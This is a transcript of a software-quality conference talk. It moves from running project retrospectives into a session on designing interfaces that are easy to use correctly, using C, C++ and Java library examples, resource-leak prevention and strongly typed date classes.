wanted to write down, this is one we all went to dinner at the Chinese restaurant, they get to write that down if that was significant to them. Each event can go on an index card or a sticky note, or you can just write it on the whiteboard if you want to. The events themselves get to be anonymous in many cases, because that way if somebody comes along later and says, oh, I see that somebody wrote that this is when somebody broke the build, and they didn't want to say who wrote that. It needs to be that issue is something which was important enough to the person to put on the timeline. It probably needs to be discussed. After everybody has gone up and written on the timeline, put all the significant events that they consider to be relevant, then there is time for viewing and reflecting on all of the events. Norm Kurth doesn't actually name this, I called this considering. That's a time when you get to look at what everybody else said. So this is the first chance for everyone involved to look at all of the comments that have been made by everybody and potentially discover some things which they had not realized. And after that becomes the discussion, which is what Norm Kurth calls mining for gold. What you're trying to identify is, okay, what worked well that we don't want to forget? Let's write that down. What should we do differently in the future? What didn't work as well? What do we need to change? And at that point, great, what should we continue discussing further in this meeting? How are we going to spend the rest of the time? 
So this is Norm Kurth's timeline exercise, again, most useful for large retrospectives. When the reading is over, when the retrospective is over, you should have some concrete results. They should include the things that worked we don't want to forget, maybe document those as patterns for the institutional memory. Things we want to do differently in the future, maybe you want to add some things, maybe you want to modify some things, maybe you want to abandon things. Interestingly, it may turn out that some of the things that you abandoned are things that you had noted in the past were really being helpful. Something which worked in the past may not work as well in the future, either because the people are different or because circumstances have changed in one way or another. You may want to have a list of things that require additional research. We want to know why certain things occurred during the software development process. We didn't understand. And you also want to have some specific action plans. Now, the action plans need to be specific. So now we know exactly what it is we're trying to accomplish. And you only want to have as many as can reasonably be accomplished soon. A laundry list of, here's 22 things we'd like to be able to change, that's not really actionable. You want to have a comparatively small list of things that can reasonably be accomplished soon. Somebody has to accept responsibility for every one of those action items because if you have an action plan and nobody follows up on it, as I said, that's just going to demoralize people and sour them on the idea of retrospectives. Unsurprisingly, retrospectives end with a retrospective. So the meeting ends, figuring out what worked well, what should be done differently in the future, how can we run better retrospectives. Now, I've already mentioned that with follow through, it's very important that somebody follows up on those action items. I've already mentioned too that if the retrospective results are ignored, then participants lose faith in the retrospectives. But more importantly, things that worked may be forgotten and not done again, and things that didn't work may be forgotten and therefore done again. So you definitely want to have some follow through here. Recently, Norm Curth has talked a little bit what he calls a kickoff retrospective. Now, a retrospective is something you do at the end of a project to figure out what worked, what didn't. A kickoff retrospective is completely different. It is used before you start the work, and it is based on the fact that what you do is you get a bunch of people together who are going to be working on a new project, so there's no history yet. And what you say is, in the future, when we look back on this project, what was so good that we want to repeat it on future projects? So you're sort of saying, if in the future you look back on this, what do you want to be able to say we did so well that we're going to want to repeat it? Because most people involved in software projects have worked on other software projects in the past, they already have some experience. They know what worked, they know what didn't work, so you're essentially saying, how shall we plan this project based on your experience on what worked on previous projects? It's also kind of nice because it's an initial meeting where the people working on the project get to say, this is how we want to run this particular project. So the guideline is to perform retrospectives. Any questions about retrospectives? Yeah. 
The timeline exercise, if it's a 12 month project, and they remember the things that didn't. Okay, so the question is, okay, let's suppose it was a 12 month project and you put together this timeline, people aren't going to remember what happened over the course of 12 months. When you're doing the timeline, especially for a long project like that, what you would do is you would tell people, look, we're going to be holding a retrospective, it's going to cover the full 12 month period. So we would expect you to review your notes, review maybe some email records, maybe look at when things were checked in. So people actually have a chance to refresh their memory and gather some data and gather some information before the retrospective. You don't simply say, why don't you show up and let's talk about what happened 12 months ago. So that was actually, I didn't so much skip over it, but I didn't mention it very much, but it had to do with, in the preparation prior to the meeting, it's the gathering of project data and artifacts. So you actually give people some warning, this is what we're going to be doing, and like I said, then they can refresh their memory about things that are relevant during that time period. Does that help a little bit? Yeah. Other questions on retrospectives? Right. Okay, so the question is, all right, so let's suppose we've had a fairly long project and maybe there were some things done at the beginning of the project that didn't go as well as it should have, but by the time the retrospective rolls around, we've forgotten about that, and so it doesn't get brought up. The purpose, I mean, presumably you're dealing with little issues as they arise during the course of developing the software anyway. The retrospective at the end is ideally a situation where people get to say, listen, these are the things that I think are relevant taking the entire project experience into account. So for a kind of a problem that occurred early in the project, what I would say is either that issue had ramifications so that at least one person at the retrospective still wants to talk about it, in which case they're going to bring it up. Or it turns out that that mistake that occurred early on in the project in the long run of the whole project was not significant enough for anybody to want to bring it up at the end. So the idea, I agree, there's going to be a natural tendency to talk about little things that occurred recently just because they're recent. But a good facilitator will try to say, listen, we're trying to focus on the project as a whole. We're trying to identify broader lessons that we can use on big projects like that. Does that help a little bit? Okay. Yeah. Okay, so the question is, could you treat performance reviews for individuals sort of using the same methodology as this? You know, I'm actually going to punt on that question and say I don't know because I haven't had to deal with performance reviews before. I focus more on software than on that kind of stuff. So I'm just going to have to answer with I don't know. I'd hate to give some misleading advice only to turn out that it was a horrible piece of advice. Sorry about that. Okay, what I want to do is talk about some things we would talk about if there were more time. We've only got one day. One day is not a lot of time to talk about how to write better software.
If I had more time, I'd talk about things like minimizing coupling. I'd talk about things like ensuring that inheritance corresponds to substitutability. I would talk about things like how defect cause analysis can fuel defect prevention. I'd talk about sweating the small stuff. I mean, there's a lot more that we could talk about. I'd talk about performing usability tests. Great book by Steve Krug called Rocket Surgery Made Easy, which I'll give you a reference to, which talks about that. But we've only got a limited amount of time. So instead, what I want to do is I want to talk about you. I want to talk about the people in this room. And I want to tell you, you know, you're all special, everybody's special, but you're not that special. I mentioned this morning at the beginning that by the end of the day, my suspicion was that most of you are going to say, OK, well, I saw some things that were new, but there was also some stuff I had seen before. My experience is that most developers recognize that the guidelines are usually valid. But at the same time, they say, you know, you're right, we should do those things, but we can't. And the reason we can't is our schedule is too aggressive or performance requirements, they're too great or our memory constraints are demanding, our platform's weird. Everybody's got an excuse. I've been doing this for a while, a couple of decades. And experience has taught me and taught my clients that the guidelines apply even if 32 bits is too small an address space. Even if the technology they're working on is changing really, really quickly. I have worked with many companies who have told me, well, this code will never have to port. That's because they have their own custom hardware. They have their own custom operating system. Aside from the fact that the code always has to port, it turns out that the guidelines that we're talking about here apply. A significant new version of the software has to be released every year. Think about video game manufacturers who either are trying to release a video game in time for Christmas or writing a sports franchise and it needs to come out at the time the season begins, because Christmas is not going to slip and neither is the beginning of soccer season. So people have to deal with those kinds of things. I have worked with people where program runs extend for months on the fastest available hardware. It was an eye-opening experience for me to work at one of the research labs for a while where they routinely talk about how many CPU months their programs take. So the thing is, following the guidelines is not that hard. It's just kind of inconvenient. Let's face it, specification free hacking, that's really convenient. The freedom: I can do whatever I want. I have no specification. Quick and dirty interfaces are really convenient. Copy and paste, there's a reason why it's a single key. It's so convenient. Skipping configuration of lint-like tools, very convenient. Avoiding retrospection, really convenient. These things are all convenient. Bug reports, inconvenient. Whack-a-mole debugging, inconvenient. Working with incomprehensible code, that's inconvenient and unpleasant. Slipped schedules are inconvenient. Unhappy customers are inconvenient, although in fairness, let's be honest, customers are inconvenient. Making the same mistakes on every project is really frustrating. You have to keep making these same mistakes over and over. The inability to add simple new features is just plain embarrassing.
I mean, really, somebody asks you for something simple and you just can't do it. Convenience is not a good excuse for poor software development practices. Some things aren't as convenient as we would like, but there's good reasons why they're less convenient. Now, the principles behind what I'm talking about are fundamentally universal. They apply almost all the time. So here's a fundamental principle. Think first, do second. That's what specifications and TDD are all about, figuring out what you want to do before you do it. Prevent errors instead of making them and then fixing them later, which is what motivates good interface design, the aggressive use of static analysis, avoiding invisible keyholes, that kind of thing. Retain flexibility. This is why internal quality and unit tests are really important. They preserve flexibility to change things. And improve what you do based on your experience rather than just doing the same thing all the time. That's what retrospectives are about. These are pretty fundamental principles. So the guideline is that you should remember, I mean, you're special, but you're not so special that the guidelines don't apply to you. And if we summarize the day, this is what we come up with. Software quality is a global optimization problem that's based on both external and internal characteristics. So we have to care about internal and external quality and its global optimization. And management of programmer discretion is critical to software quality because programmers have a lot of decision making ability that they are going to exercise. The guidelines I talked about were number one to insist on a useful specification. We talked about how that can be formalized to things like unit tests or design by contract. I spent a lot of time talking about making interfaces easy to use correctly and hard to use incorrectly. We talked about the importance of static analysis both by machine and by humans. I talked about avoiding the introduction of keyholes, unjustifiable constraints. We talked about minimizing duplication of both source and object code. We talked about embracing automated unit testing and finally performing retrospectives. And then I tried to convince you that really, I'm talking to you, not talking to anybody else, just you guys. We talked about a lot of different topics here. So general information about quality code. Steve McConnell's book I referred to a couple of times, Karl Wiegers's book. I'm not going to read, this goes for many pages, so I'm not going to read this to you. Design by contract and assertions, interface and API design, we talked about that. User interface design, template metaprogramming, that's for the C++ people in the crowd. Everybody else stay away. A lot of references for static analysis. Static analysis by machines. More static analysis by machines. Still more static analysis by machines. By machines for dynamic languages. Dealing with lint output. Static analysis of object code. Static analysis by humans. I like static analysis. More static analysis by humans. There's a lot that you can read. Keyholes, not much on that because nobody cares but me. At this location here you're going to find the draft chapters of a book that I was going to work on. It's an abandoned project now, but I still feel, as you can probably tell, fairly strongly about the topic. This is about duplication, both source code duplication and object code duplication. The Pragmatic Programmer, this book here is what popularized the DRY principle.
This is some information on aspect-oriented programming. Some interception, which is an approximation to aspect-oriented programming. Unit testing and test-driven development. Some information there. Some more information there. Some information on testing concurrent programs. Some stuff on refactoring. And some information on retrospectives. I told you there were a lot of topics. Some information on retrospectives. Some more information on retrospectives. And some information on usability testing. Just out of curiosity, how many people have been here the entire day? So I feel badly for you. I mean, you wasted the whole day. But I have a little something for you. If you would like a PDF copy of the handout, so all the slides that I showed here, then send me some email. That's my email address. I hope I spelled it correctly. Basically, all you have to do is say, you said that if I sent you email asking for the handouts, then you would send me the handouts. And if you send me that mail, I will send you the handouts. So I felt badly that they didn't. I actually thought the conference was going to make them available to you anyway. So there was just kind of a misunderstanding there. So any questions about anything to do with any of the topics that we talked about today? Yes. Do you have any measures on the problem that affects better quality for using holders? Okay, so the question is, do I have any data or any measures on how much better your software is going to be if you do all of the things that I talked about here? The short answer is no. But there is data on certain aspects. For example, you can find empirical data about the percentage of defects that can be identified by static analysis, both by machines and by human beings. If you want to read about useful specifications, there's a lot of literature about the importance of improving specifications and stuff like that. So each of the individual topics, if you look them up, except for keyholes, you're going to almost certainly find some empirical data. So that's the best I can offer you there. Alrighty, so that is the presentation. Thank you very much for spending the day with me. Given that there were seven competing tracks and so many people spent the entire day here, I am truly honored. So thank you very much. Please fill out your evaluations: please choose your colored cards and drop them in the bin at the back. Thank you very much.
|
Automating Unit Tests
|
10.5446/51509 (DOI)
|
If one of the people sitting on the unbelievably comfortable concrete would prefer to move to a seat right there, which is probably less comfortable because it's got all that cushioning and it sits up higher, there's enough room for one person to do that. Okay, since this is the only all-day session running at the conference, I will mention again this is part three of an all-day session. You should be able to follow along even if you haven't been present for the first two sessions. We are talking about ways to improve interfaces at this point, and in particular we're talking about what I consider the most important design guideline, which is how to make interfaces easy to use correctly and hard to use incorrectly. Before the break, we were talking about the importance of consistency. I gave an example of inconsistency here between what the software says and what the hardware says as to where you're supposed to deposit things. We talked about how Java had three different ways to find out how many elements were in a container. Microsoft optimized that to only two different ways to figure out how many elements were in a container. Then I explained that sometimes it has unanticipated consequences, such as even people who thought, well, I'm always going to be using an integrated development environment, were surprised to find out that that complicates reflection-based code. It's not entirely fair that I'm picking on things like Java and C-Sharp because really there are so many other things to pick on. Let's go back to C. Let's go back to the beginning, to C. It doesn't get much older than that in many cases. In the C standard library, you've got some members of the standard library where the first parameter is a file pointer. Nice and consistent. First parameter is the file pointer. That's great. But that's only part of the library, because the problem is that in other parts of the library, the file pointer is the last parameter. If you talk to experienced C programmers, people who have been programming in C for 20, 30 years, they will tell you they still have to look it up every single time to find out what's going on. It has been remarked that this inconsistency has frustrated millions of developers for more than 30 years. If you think about it, it seems like such a little thing: what is the order in which we put the parameters? If you are so lucky as to design an interface that is still being used 40 years from now, do you really want to be remembered for something like this? This is not what you should be aspiring to. At the time it probably didn't seem like such a big deal, but when things are successful, and we all would like our things to be successful, they should put their best foot forward, and this is inconsistent. This is from the C++ 98 standard library. If you want to eliminate all the elements in a particular container with a given value, if your container is a set, you call erase. If your container is a multi-set, you call erase. If your container is a map, you call erase. If your container is a multi-map, you call erase. Yes. If your container is a list, you call remove. Okay. Now if we look at the C++ 98 standard library, we find a different kind of inconsistency that nevertheless is problematic. So in the C++ 98 standard library, there is a function called sort. And sort will run in n log n time or your code will not compile. The underlying principle here is if you ask us to do something and we can't do it efficiently, we're not going to compile it. All right, that's a reasonable principle.
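To make that principle concrete, here is a minimal C++ sketch (my own illustration, assuming C++11, not code from the slides): std::sort requires random-access iterators, so asking it to sort a std::list simply does not compile, and the list provides its own member sort instead.

    #include <vector>
    #include <list>
    #include <algorithm>

    int main() {
        std::vector<int> v{3, 1, 2};
        std::list<int>   l{3, 1, 2};

        std::sort(v.begin(), v.end());    // fine: vector iterators are random access
        // std::sort(l.begin(), l.end()); // does not compile: list iterators are only
                                          // bidirectional, so the n log n algorithm
                                          // cannot be applied
        l.sort();                         // the list supplies its own member sort
    }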
However, there is another function in the standard library called binary search. Binary search will run in log n time, which is what you would expect from a binary search if it can. And if it can't, it actually runs in linear time, strangely enough. And you should see the way that they specify that to avoid having to look like they're complete liars. Now this philosophy says we will do something no matter what it takes regardless of how slow it is. That's also a legitimate principle. The problem is when you have both of these principles in the same library at the same time, you end up in a situation where programmers don't know if they call a particular standard library routine, whether it's going to compile, and if it does compile, whether it's going to be fast. That doesn't help anybody. Again, this is not a syntactic thing. This is more of a principle that was not applied consistently. So the issue of consistency arises in a lot of different forms. So something else from the C++98 standard library. There is a function called sort. It is not guaranteed to be stable. For what it's worth, sorts can be either stable or not stable. The difference is not important. You just need to know that there are two possibilities, stable or not stable. So sort is not guaranteed to be stable. If you need stability in your sorting, no problem. There is a different function. It is called stable sort. Stable sort is guaranteed to be stable. That seems pretty reasonable. And then there is a member function called sort in the list class. It's called sort, and it's guaranteed to be stable. So this sort, not guaranteed to be stable, this sort is guaranteed to be stable. Again, it's not that difficult to choose an appropriate name. Remember I told you that choosing good names is really important. This is a case where one could easily imagine for somebody familiar with calling stable sort, they would assume that this version of sort is not stable, simply because things are inconsistent. Another technique that you can use to make your interfaces easy to use correctly and hard to use incorrectly, and remember the higher level design guideline we're talking about is making interfaces easy to use correctly, hard to use incorrectly. What we're talking about are different ways that you can go about doing that. So we've talked about consistency, and now I'm talking about progressive disclosure. Fundamentally progressive disclosure is about presenting options to people in a way that avoids overwhelming them with choices. The more choices you give people, the higher the likelihood they're going to accidentally choose the choice that is inappropriate. So you don't want to overwhelm people with choices. Fundamentally, what you want to be able to do is distinguish normal options from expert and advanced options. Statistically speaking, most people aren't experts. They don't want to do the most advanced stuff in the world. There are many examples of how this is done correctly. So as an example, this happens to be from Firefox. So here in Firefox, if I'm under the content tab, then these are the choices I have available to me. But it turns out there's additional choices. But if I want to get at them, I click on advanced, and then I can come over and I have some more options here. But what that means is that users are not shown all these options simultaneously. They are encouraged to limit themselves to these options, and they only get these options if they expressly ask for them.
When you have partitioned things appropriately, people should be less likely to get into trouble by fiddling with this stuff when they should be fiddling with this stuff. So that's progressive disclosure. Now it is important to recognize that simply partitioning things does not correspond to progressive disclosure. So for example, this is from a program called Super. Now it has these lovely laid out areas. So things are nicely divided, but there's no progressive disclosure here. Every option is sitting right in front of you. And similarly, this happens to be iTunes, but there's not really progressive disclosure here either. It's divided into various tabs that's categorization. But on every tab, every option you have available is available to you. Categorization is great. I'm not opposed to categorization. It's just important to recognize categorization is not progressive disclosure. Progressive disclosure is not based on dividing things into equal categories. It is designed around the idea that some things are more likely to be needed to be addressed than others. And the things that are more likely to be needed to be accessed by users are the ones that should be presented first. This is also applicable to class and library design. What you could do is if you have an API, if you have some interface, you could imagine breaking it into the functions people are more likely to want to call and the functions people are less likely to want to call. Now, Ken Arnold had an article called Programmers Are People Too. This was published in 2005. And his central thesis in that article was we go to a lot of work in user interface design to encourage people to make the right choices and stay away from the wrong choices. And yet we hand developers these giant APIs where there's a whole bunch of methods or a whole bunch of functions all at the same level. And we basically say, so here are some functions, use the right ones, even though some functions are much more likely than others to be useful. And he gives this example: in Java Swing's JButton class, there are over 100 methods. But it turns out that typically people only want a very small minority of these 100 methods. So essentially giving people who use the button class 100 different methods just encourages them to get in trouble. It doesn't distinguish between the methods you probably want to call from the methods you don't want to call. And he offers a design in which you retain a few commonly used methods in the JButton interface. So the interface immediately shrinks much, much smaller. Those are the things most people are going to want to use. And then he says, take for example the button tweaking functionality that tweaks exactly the way the button looks and put that into an object that is accessible by, for example, a JButton getExpertKnobs method. What this would mean is if you wanted to work on this special functionality, you wouldn't be able to call the method directly. You'd have to call and get an intermediate object, which itself would offer those methods. So you'd have to take an additional step to get at the more complicated methodology. Similarly for integration functionality, which has to do with integrating JButton with other parts of the system, offer a getIntegrationHooks method and remove that from JButton. So everything is still in the interface. Users can do just as much as they could do before.
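Rendered as a rough C++ sketch rather than Java (the class and method names here are my own, purely illustrative), the reshaped interface might look something like this:

    #include <functional>
    #include <string>

    class ButtonExpertKnobs { /* fine-grained appearance tweaking lives here */ };
    class ButtonIntegrationHooks { /* system-integration details live here */ };

    class Button {
    public:
        // The small set of operations almost everyone needs:
        void setText(const std::string& text);
        void setEnabled(bool enabled);
        void onClick(std::function<void()> handler);

        // Advanced functionality is reached through separate accessor objects:
        ButtonExpertKnobs&      expertKnobs();
        ButtonIntegrationHooks& integrationHooks();

    private:
        ButtonExpertKnobs      knobs_;
        ButtonIntegrationHooks hooks_;
    };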
The difference is that when they look at the interface, they say, oh, here's the small set of methods I probably want to call, and here are two additional objects I can access if I need advanced method functionality. It naturally encourages users to focus on these methods, which are the ones you probably want to use, and don't be distracted by all those other methods that you probably don't want to use. And the result of this would be an interface that would be easier to use correctly and harder to use incorrectly without losing any functionality. The next thing you can do to make interfaces easy to use correctly and hard to use incorrectly is to prevent resource leaks. Any time you tell people, so do this and later do that to get rid of the resource, there are two possible problems. Any interface that looks like this. There's a resource, and you say, OK, I'm going to get the resource, and later on I have to release the resource. Any interface, and it doesn't matter what the resource is. The resource can be memory, the resource can be a file handle, the resource can be a mutex, the resource can be a font handle, any resource, where you ultimately have to release the resource later. If you have this kind of an interface, you have two problems. Number one, whoever gets the resource can fail to release it. They can call it zero times. That's normally called a resource leak. Problem number two, they can't count, which means they release it more than once. So problem number two is they make more than one call, in which case you might get a runtime exception, you might get undefined behavior. Anybody who's ever had the problem, for example, of dealing with mutexes, if you acquire a mutex and you never release it, kind of bad. If you acquire a mutex and you release it more than once, equally bad on many platforms. So you would like to avoid those kinds of problems. Any interface that has this characteristic that says once you've done this, later you have to do that, immediately has a problem. Now, one way to resolve this problem is whenever you can, when somebody wants a resource, what you don't do is you don't give them the resource. You actually return to them a resource manager. And the resource manager object automatically manages the resource's lifetime, such that the person using the resource simply doesn't have to worry about it. The simplest way to implement this under the hood usually is to do the timing of resource release based on reference counting. And fundamentally, under the hood, you're counting how many references refer to the resource. When there's no more references to it, you can automatically release the resource. It's a little bit different from garbage collection because garbage collection doesn't release things deterministically. For example, you would like to release a mutex as soon as you possibly can, not at some point after as soon as you possibly can. This is a common thing in C++, although arguably that's because we don't have garbage collection. It's based on automatic deterministic finalization. In other words, we know exactly when objects will be either destroyed or finalized. And that's specified by the language semantics. Java and Csharp, for example, they don't have this feature, although Csharp has a using statement which approximates it. Unfortunately, callers have to remember to use it. So if callers forget to use using, then the automatic mechanism for making sure that things get released doesn't kick in.
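As a rough C++ sketch of the resource-manager idea (assuming C++11; the function name openFile is my own): instead of handing out a raw FILE* or a raw lock, you hand out an object whose destructor, driven by reference counting in this case, does the release for you.

    #include <cstdio>
    #include <memory>
    #include <mutex>

    // A reference-counted manager for a FILE*: the file is closed automatically
    // when the last copy of the shared_ptr goes away, so there is no
    // "remember to close" rule for callers to break.
    std::shared_ptr<std::FILE> openFile(const char* name, const char* mode) {
        return std::shared_ptr<std::FILE>(std::fopen(name, mode),
                                          [](std::FILE* f) { if (f) std::fclose(f); });
    }

    std::mutex m;

    void example() {
        auto f = openFile("log.txt", "w");    // no matching close call anywhere
        std::lock_guard<std::mutex> lock(m);  // mutex released automatically at scope exit
        if (f) std::fputs("hello\n", f.get());
    }                                          // lock released here; file closed when f dies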
At the same time, reference counting schemes have trouble with cyclic structures, so reference counting is not the solution to every problem either. But that's a separate issue. The fundamental idea is get away from interfaces that require that people release resources they acquire, and whenever you can come up with a way to do it, replace them with interfaces where the resource release is automated so that clients don't need to worry about it. How you implement it often will be reference counting, but that's not the only way to do it. Setting aside the details of all of this, I told you earlier that it is not uncommon for systems to be fairly complicated, and you have to move the complexity around somewhere so that somebody has to deal with it. What you want to do is minimize the number of places where resource management needs to occur. Hide it from as many people as possible, which is just an example of whenever it's possible, you encapsulate the tricky stuff. So if there's a way for an error to occur, try to design that error so that it's only something which can be made by as few people as possible, ideally you're going to hide it inside a class or inside a function, so only the class implementer or the function implementer has to worry about it. In terms of preventing resource leaks, one thing you can do is C++'s idea of what is unfortunately called resource acquisition is initialization, which says that constructors acquire resources and destructors release them. The whole idea is that destructors are responsible for releasing resources. There are other ways to do it though. For example, let us suppose what I want to do is make it possible for someone to be able to write some data to a file. It doesn't sound very complicated. Let's write data to a file. What do I have to do? I have to open the file, write the data, I have to close the file, which means I can forget to close the file, which means I can't count and I can close the file more than one time. That's an error prone design. If I open the file, I essentially have a resource, I have to release the resource. What I could do is encapsulate that in a function called write to file. I could say, here's a function write to file, that's the name of the file I want to write to and this is the data that I want to write. Now all a client has to say is, I want to write this data to this file. It is now up to the implementer of write to file to open the file, write the data and close it. But as a result, the client doesn't have to think about opening and closing files. Or let's suppose I want to make it possible for somebody to easily acquire a lock, do some work and then release the lock. Because I don't want to have them have to remember to release the lock when they're done. I write a function called do locked work. This is the object that needs to be locked and that's the function that should be called on the object once it has been locked. So as a client, I simply say do this to that object in a thread safe fashion and this function do locked work takes care of it. These kinds of interfaces are nice for avoiding usage errors. They don't necessarily replace lower level interfaces, though. As an example, if I have a whole bunch of different things to write to the file, I don't really want to open the file, write a line, close the file, open the file, write a line, close the file, open the file, write a line, close the file.
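A bare-bones C++ version of those two wrappers might look like this (a sketch only; error handling and the exact signatures are assumptions on my part):

    #include <fstream>
    #include <functional>
    #include <mutex>
    #include <string>

    // Open, write, close: the caller never touches the file handle.
    void writeToFile(const std::string& fileName, const std::string& data) {
        std::ofstream out(fileName);   // opened here
        out << data;
    }                                  // closed here, even if an exception is thrown

    // Lock, call the function, unlock: the caller never touches the mutex.
    template <typename T>
    void doLockedWork(T& obj, std::mutex& m, const std::function<void(T&)>& work) {
        std::lock_guard<std::mutex> lock(m);
        work(obj);
    }

Of course, a caller with many separate pieces of data would then be opening and closing the file, and taking and dropping the lock, over and over again.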
That would be very inefficient and in a multi-threaded environment it could lead to interleaving problems which wouldn't even be correct. Similarly, if I have several things which need to be done to a particular object under the same lock, I don't really want to get the lock, do some work, release it and then get the lock again, do some work and release it again. It might be inefficient and it might not have the right behavior. So I probably do need lower level APIs that will give me the ability to expressly manage the resources. But what I want to do is I want to advocate these kinds of interfaces, make them very well known to my clients. I want to give them especially beautiful names so that they're attractive and people want to use them. And the lower level APIs, I want to give really ugly, gross, hard to use names that no one wants to type to discourage people from using them. So I give them the functionality but I'm encouraging them to do things the easy way that is less error prone and I'm discouraging them from doing things the way that is more error prone. One of the nice things about programmer discretion is that, like water, it often will seek the easiest path to where it needs to go. You can also do things like have one high level object that manages multiple resources. So for example, if I have some work to do which requires opening a bunch of files, doing some work and then closing all of the files, this means I have to remember to close all of those files. So maybe what I want to do is have a multi-file object where a multi-file object actually opens and closes files as a group. So now it may be the case that clients still have to remember to expressly tell the multi-file object, okay, I'm done with you, it's time to be closed now, but instead of having to remember to close N files and release N resources, now they only have to remember to release one resource. Fewer things for them to remember, fewer opportunities for making errors. As long as we're on the topic of resource leaks because it is an important topic, something else you can do is augment prevention with detection. Typically you can't design all possible resource leaks out of a system. When you can't design them out of the system, resource leaks tend to be hard to track down. So what you can do is build auditing support into your resource managing classes. You can therefore figure out who acquires what, so for example, maybe which thread acquires what or which function is making certain calls. This will then allow you later to find out who acquired what at what point and failed to release it, which allows you to detect leaks as soon as possible. Fundamentally, aggressive detection helps prevent leaks from making their way into software production. So that's the story on resource release. Something else you can do to make interfaces easy to use correctly and hard to use incorrectly is to document your interfaces before you implement them. This is a wonderful way to find out about resource problems, excuse me, about interface problems. If you find that it is unpleasant to explain how an interface works, it's going to be really unpleasant to use. So just by describing what the interface is going to look like and how it's going to be used, this can make it much more likely you'll design a good interface in the first place. Some of the things we've talked about become pretty obvious. If there's surprising or underspecified behavior, you're going to have to document it.
You're going to have to say, be aware that if blah, blah, blah. You want to be able to eliminate that kind of comment. You shouldn't have to make those kinds of comments about interfaces. Bad names, inconsistencies in names or in layouts, opportunities to leak resources, all of these things tend to become more visible if you document the interfaces before you actually write them. This is consistent with test-driven design, which we'll talk about later on this afternoon. One of the most important things that you can do to improve the quality of your interfaces is to introduce new types. Assuming you are working in a strongly typed language, the type system is an unbelievably powerful weapon in preventing people from making certain kinds of mistakes. Let us consider something like, I have a class for representing dates in time. Here's a date class. The month is an integer, the day is an integer, the year is an integer. The first thing to notice is that because these are all integers, it is impossible for the compiler to tell the difference between a month, a day, and a year. That means it's really easy for people to pass things in the wrong order. Dates are particularly susceptible to this because in the United States we typically do month, day, year, whereas in other parts of the world it's day, month, year. That's an easy kind of mistake to make. There's a generalization of this. Any function interface, which has two parameters of the same type that are adjacent to one another, means that if you swap the order for some reason, the compiler will be unable to tell. If you have any function interfaces, which take two parameters of the same type or of compatible types that are adjacent to one another, you inherently have the problem that people could call by passing parameters accidentally in the wrong order. You would then want to consider finding a way to eliminate those two adjacent parameters that are of the same type. What we can do in this particular case, which would also solve the general problem of having two parameters adjacent to one another, is to turn day, month, and year into classes. Now I'm doing the minimal possible work in C++ to make this work. I've just said, okay, day is now a type, month is now a type, and year is now a type. I haven't made them full-blown classes. I haven't done any encapsulation. I just told the compiler that they're different types. Now I can say, okay, here's my date class. I have a month object that comes first. I have a day object that comes second. I have a year object that comes third. Now there is no ambiguity. It is now impossible to pass parameters in the wrong order, and as a bonus, the calling code is clear. So if I say, date D of 4, 8, 2005, well, this is not going to compile because the types are wrong, but if I say the month is 4, the day is 8, and the year is 2005, then that will compile. So it eliminates ambiguity, and it makes the calling code a lot clearer as well. This approach only works if you actually create distinct types that the compiler views as being separate. Now in C and in C++, at least, you can do type defs. So you can say, okay, when I say int, excuse me, when I say day, I mean int. When I say month, I mean int. When I say year, I mean int. Now I can say the date is month, day, and year, and now I can say, okay, great, the day is 4, the month is 8, the year is 2005, except that's wrong. I really wanted it to be the month was 4 and the day was 8.
The problem is that although the source code looks pretty, the types are all the same. This is what I call programming to make you feel better about yourself. You don't actually improve the quality of the code. It's more readable, but it doesn't prevent mistakes. In case you want to know why I have this fixation on April 8, that's the day we got our puppy, Darla, who's not quite so small anymore. Now Darla is adorable. That's the most important thing in this entire seminar, is that Darla is adorable. But it's still possible to use the interface incorrectly. For example, somebody could say, okay, the day is 8 and the month is minus 4 and the year is 2005. Well, obviously the month is not minus 4. Well, you might say, look, no one is going to say the month is minus 4. Actually, I can think of two ways, plausible ways you might end up with a month of minus 4. One of them is someone's hacking your system and trying to break it. It's a security issue. That's one possibility. The more interesting possibility is they didn't write minus 4. What they wrote was something like x minus y, when what they should have written was x plus y, or some other simple typo in expressions. In other words, they meant to get it right, they just made a mistake. This doesn't solve all of your problems. All right, let's eliminate invalid months. There are only 12 months. What we can do is we can enforce that constraint. We're going to make month a real class. We're going to declare 12 immutable month objects. We're going to limit the creation of month objects to copies of those values. In C++ it would look like this. Here's a month class. I have static objects for January through December. Then the constructor for month from integer is declared private. This prevents people from creating new months. This prevents people from creating uninitialized months. The point is I'm making it so that people can only use one of 12 possible values. Then we initialize all these month objects to make sure that they have the appropriate integer inside them. The result now is better. If I try to say, okay, the month is minus 4, this won't compile because you can't call this constructor. Instead, you have to say the month is, oh, it's month colon colon April. We take advantage of the fact that we know there are only 12 possible values. We enumerate those values and then we eliminate the possibility of using anything other than those specified values. We haven't eliminated all the problems because now we've got the possibility of saying, okay, the day is 71. I don't know of any months with 71 days in them. If I wanted to make it so that the day and the year were impossible to get wrong, if you're willing to work at it hard enough, you can do it. For example, I might say, okay, I'm going to create a year object and then from the year objects, I'll get month objects. Then from the month objects, I will get day objects. They will only give me objects corresponding to valid days in the valid month of the valid year. You can clearly do that. Now that's not what I'm advocating. I'm not saying everybody should go out and create year objects and month objects and day objects that enforce these kinds of constraints. My experience has been that in many cases, people don't think about how interfaces can be used incorrectly. I believe when you design an interface, it is a very important exercise to say, okay, here's my prospective interface. How could people innocently use it incorrectly? How could they accidentally make mistakes?
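Before weighing those trade-offs, here is a compact C++ sketch of the Month idea just described (my own rendering, trimmed to three of the twelve objects; the exact names are illustrative):

    class Month {
    public:
        static const Month Jan;   // one immutable object per valid month ...
        static const Month Apr;
        static const Month Dec;   // ... January through December in the real thing
        int value() const { return m; }
    private:
        explicit Month(int month) : m(month) {}   // private: outsiders can't invent months
        int m;
    };
    const Month Month::Jan(1);
    const Month Month::Apr(4);
    const Month Month::Dec(12);

    // Date(Month(-4), ...) no longer compiles; callers must write Date(Month::Apr, ...).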
